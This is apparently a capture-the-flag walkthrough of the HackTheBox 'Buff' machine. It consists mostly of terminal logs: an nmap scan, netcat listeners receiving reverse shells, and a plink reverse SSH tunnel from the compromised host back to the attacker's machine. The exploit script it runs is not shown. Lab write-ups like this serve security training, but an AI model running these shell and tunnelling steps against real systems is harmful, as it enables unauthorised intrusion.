root@JIYE:~/htb/buff# nmap -sC -sV -sT 10.10.10.198 -oN nmap.CVT Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-01 02:33 EDT Nmap scan report for 10.10.10.198 Host is up (0.32s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) | http-open-proxy: Potentially OPEN proxy. |_Methods supported:CONNECTION |_http-title: mrb3n's Bro Hut Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 60.65 seconds root@JIYE:~/htb/buff#
root@JIYE:~/htb/buff# nc -nvlp 6666 listening on [any] 6666 ... connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 51130 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved.
Host Name: BUFF OS Name: Microsoft Windows 10 Enterprise OS Version: 10.0.17134 N/A Build 17134 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: shaun Registered Organization: Product ID: 00329-10280-00000-AA218 Original Install Date: 16/06/2020, 15:05:58 System Boot Time: 01/09/2020, 10:57:29 System Manufacturer: VMware, Inc. System Model: VMware7,1 System Type: x64-based PC Processor(s): 2 Processor(s) Installed. [01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz [02]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: VMware, Inc. VMW71.00V.13989454.B64.1906190538, 19/06/2019 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume2 System Locale: en-us;English (United States) Input Locale: en-gb;English (United Kingdom) Time Zone: (UTC+00:00) Dublin, Edinburgh, Lisbon, London Total Physical Memory: 4,095 MB Available Physical Memory: 2,240 MB Virtual Memory: Max Size: 4,799 MB Virtual Memory: Available: 2,325 MB Virtual Memory: In Use: 2,474 MB Page File Location(s): C:\pagefile.sys Domain: WORKGROUP Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. [01]: vmxnet3 Ethernet Adapter Connection Name: Ethernet0 DHCP Enabled: No IP address(es) [01]: 10.10.10.198 [02]: fe80::fc70:a698:752c:f5c3 [03]: dead:beef::9007:7d8e:af8f:9419 [04]: dead:beef::fc70:a698:752c:f5c3 Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
PS C:\xampp\htdocs\gym\upload> .\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216 .\plink.exe -v -x -a -T -C -noagent -ssh -pw "root" -R 8888:127.0.0.1:8888 root@10.10.17.216 Looking up host "10.10.17.216"for SSH connection Connecting to 10.10.17.216 port 22 We claim version: SSH-2.0-PuTTY_Release_0.74 Remote version: SSH-2.0-OpenSSH_8.3p1 Debian-1 Using SSH protocol version 2 Doing ECDH key exchange with curve Curve25519 and hash SHA-256 (SHA-NI accelerated) Server also has ecdsa-sha2-nistp256/ssh-rsa host keys, but we don't know any of them Host key fingerprint is: ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e The server's host key is not cached in the registry. You have no guarantee that the server is the computer you think it is. The server's ssh-ed25519 key fingerprint is: ssh-ed25519 255 83:5a:22:c2:54:d1:3b:98:fa:09:81:52:f2:3b:75:8e If you trust this host, enter "y" to add the key to PuTTY's cache and carry on connecting. If you want to carry on connecting just once, without adding the key to the cache, enter "n". If you do not trust this host, press Return to abandon the connection. Store key in cache? (y/n) y Initialised AES-256 SDCTR (AES-NI accelerated) outbound encryption Initialised HMAC-SHA-256 (SHA-NI accelerated) outbound MAC algorithm Will enable zlib (RFC1950) compression after user authentication Initialised AES-256 SDCTR (AES-NI accelerated) inbound encryption Initialised HMAC-SHA-256 (SHA-NI accelerated) inbound MAC algorithm Will enable zlib (RFC1950) decompression after user authentication Using username "root". Sent password Initialised delayed zlib (RFC1950) decompression Initialised delayed zlib (RFC1950) compression Access granted Requesting remote port 8888 forward to 127.0.0.1:8888 Opening main session channel Remote port forwarding from 8888 enabled Opened main channel Started a shell/command Linux JIYE 5.7.0-kali1-amd64 #1 SMP Debian 5.7.6-1kali2 (2020-07-01) x86_64
The programs included with the Kali GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. ls arachni cacert.der clash CS4.0 Desktop Documents Downloads get-pip.py htb Lluna.ovpn Lluna.ovpn.bak Music Pictures Public python_shell Templates Videos vulnhub
root@JIYE:~# nc -nvlp 7078 listening on [any] 7078 ...
执行buff.py利用
1
root@JIYE:~/htb/buff# python3 buff.py
1 2 3 4 5 6 7 8 9 10
root@JIYE:~# nc -nvlp 7078 listening on [any] 7078 ... connect to [10.10.17.216] from (UNKNOWN) [10.10.10.198] 50209 Microsoft Windows [Version 10.0.17134.1610] (c) 2018 Microsoft Corporation. All rights reserved.